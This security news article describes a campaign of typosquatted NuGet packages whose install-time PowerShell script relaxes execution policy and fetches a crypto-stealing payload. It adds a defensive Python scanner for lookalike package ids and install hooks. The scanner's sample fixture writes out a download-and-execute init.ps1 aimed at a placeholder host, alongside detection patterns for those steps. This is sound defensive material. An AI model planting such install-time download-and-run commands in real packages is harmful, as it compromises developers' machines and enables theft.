A sophisticated attack campaign has been identified targeting .NET developers through malicious NuGet packages uploaded to the public NuGet repository (nuget.org). The packages impersonate legitimate, popular packages to lure developers and attempt to deliver a cryptocurrency stealer.

Typosquatted NuGet packages

According to JFrog researchers, the attackers relied on typosquatting: each malicious package carries a name that closely resembles that of a genuine, widely used package.
  • For instance, they published a malicious package named Coinbase[.]Core (downloaded 121.9K times) to imitate the genuine Coinbase package.
  • Other malicious packages include Anarchy.Wrapper.Net (30.4K downloads), imitating the genuine Anarchy-Wrapper, and DiscordRichPresence.API (14.1K downloads), imitating DiscordRichPresence.
  • These top three packages alone were downloaded over 150,000 times within one month, indicating the campaign's reach. Note that nuget.org download counts include mirror and automated traffic, so they are an upper bound on the number of affected developers rather than a count of compromised machines.

In all, 13 malicious packages were identified, all created within the past three months. All of them have since been removed from the repository.

What do the packages do?

When a package is installed, a PowerShell script bundled inside it (init[.]ps1) runs automatically and changes the machine's configuration so that further PowerShell scripts run without prompts or restrictions, i.e. it relaxes the PowerShell execution policy.
  • The script then downloads a second-stage payload, a custom-built Windows executable named Impala, which attempts to steal cryptocurrency from the victim's wallet and exfiltrates what it collects through Discord webhooks.
  • The payload also bundles an Electron archive (asar) extractor and uses the Rasar utility to unpack Electron archives and run code from them.
  • It further drops an updater executable that polls the C2 server for newer versions of the malware.
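The two warning signs described above, a package id that is a near-miss of a known one and a bundled install-time script that relaxes the execution policy and fetches a remote binary, can both be checked before a package is ever installed. The following Python is an added example written for this article; it is not code from JFrog, Cyware or any NuGet tooling. It treats a .nupkg as what it is, a zip archive with a .nuspec manifest, scans it for the legacy install hooks NuGet executes from the tools/ folder (init.ps1, install.ps1), flags the behaviours listed above with simple regexes, and compares the package id against a short list of known ids taken from the report. The list of known ids, the score weights, the regexes and the sample package built by build_sample_nupkg() are all constructed for illustration (the sample's download URL is a placeholder, not a real C2).

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from difflib import SequenceMatcher

# Install-time hooks that NuGet (packages.config style) runs from the package's
# tools/ folder when the package is installed in Visual Studio.
INSTALL_SCRIPTS = ("tools/init.ps1", "tools/install.ps1")

# Behaviours from the campaign above, expressed as case-insensitive regexes.
# Constructed heuristics for this example, not an exhaustive signature set.
SUSPICIOUS_PATTERNS = {
    "execution-policy-change": r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)",
    "remote-download": r"(Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer)",
    "dynamic-execution": r"(Invoke-Expression|\bIEX\b|Start-Process)",
}

# Genuine ids the malicious packages imitated, per the report. In practice this
# would be your organisation's allow-list of approved packages.
KNOWN_PACKAGES = ["Coinbase", "Anarchy-Wrapper", "DiscordRichPresence"]


def normalize(name):
    """Lower-case and strip separators so Coinbase.Core and coinbase-core compare equal."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def typosquat_candidates(package_id, known=KNOWN_PACKAGES, threshold=0.75):
    """Return known ids that package_id resembles without being one of them."""
    n = normalize(package_id)
    hits = []
    for k in known:
        kn = normalize(k)
        if n == kn:
            return []  # the id is itself a known package
        # Suffix/prefix extensions (Coinbase -> Coinbase.Core) and near edits (Coinbas).
        if n.startswith(kn) or n.endswith(kn) or SequenceMatcher(None, n, kn).ratio() >= threshold:
            hits.append(k)
    return hits


def scan_nupkg(data):
    """Inspect .nupkg bytes; return the package id, lookalike hits and script findings."""
    findings = {"id": None, "typosquat_of": [], "scripts": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # The manifest sits at the archive root as <id>.nuspec.
        nuspec = next((n for n in names if n.endswith(".nuspec") and "/" not in n), None)
        if nuspec:
            root = ET.fromstring(z.read(nuspec))
            # The nuspec default namespace is versioned, so match on the local tag name.
            for el in root.iter():
                if el.tag.split("}")[-1] == "id":
                    findings["id"] = (el.text or "").strip()
                    break
        if findings["id"]:
            findings["typosquat_of"] = typosquat_candidates(findings["id"])
        for n in names:
            if n.lower() in INSTALL_SCRIPTS:
                text = z.read(n).decode("utf-8", errors="replace")
                findings["scripts"][n] = [
                    label for label, pat in SUSPICIOUS_PATTERNS.items()
                    if re.search(pat, text, re.IGNORECASE)
                ]
    return findings


def risk_score(findings):
    """Crude score: 2 per lookalike id, 1 per install script plus 1 per flagged behaviour."""
    score = 2 * len(findings["typosquat_of"])
    for labels in findings["scripts"].values():
        score += 1 + len(labels)
    return score


def build_sample_nupkg():
    """Constructed fixture mimicking the campaign's layout. Not a real package."""
    nuspec = (
        '<?xml version="1.0"?>'
        '<package xmlns="http://schemas.microsoft.com/packaging/2013/05/nuspec.xsd">'
        "<metadata><id>Coinbase.Core</id><version>1.0.0</version>"
        "<authors>unknown</authors><description>sample</description></metadata></package>"
    )
    init_ps1 = (
        "param($installPath, $toolsPath, $package, $project)\n"
        "Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force\n"
        '$u = "https://example.invalid/stage2.exe"  # placeholder URL, not a real C2\n'
        'Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\\stage2.exe"\n'
        'Start-Process "$env:TEMP\\stage2.exe"\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Coinbase.Core.nuspec", nuspec)
        z.writestr("tools/init.ps1", init_ps1)
        z.writestr("lib/netstandard2.0/Coinbase.Core.dll", b"MZ placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    result = scan_nupkg(build_sample_nupkg())
    print(result, "risk =", risk_score(result))
```

Run against a real feed, the same scan_nupkg() can be pointed at every .nupkg in the local cache (~/.nuget/packages on the developer machine) or at packages as they enter an internal mirror. The id comparison is deliberately loose (prefix, suffix or a high similarity ratio) because the campaign's names were extensions of genuine ids rather than single-character edits; tune the threshold and allow-list to your own dependency set.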

The bottom line

Incidents like these are a reminder that public package repositories need automated screening of the code that is uploaded to them. Developers should scrutinise packages before installing them, especially those from new or unknown authors: confirm the exact package id matches the one intended, check the publisher and the package's history, and treat any package that ships install-time scripts with particular suspicion.
Cyware Publisher
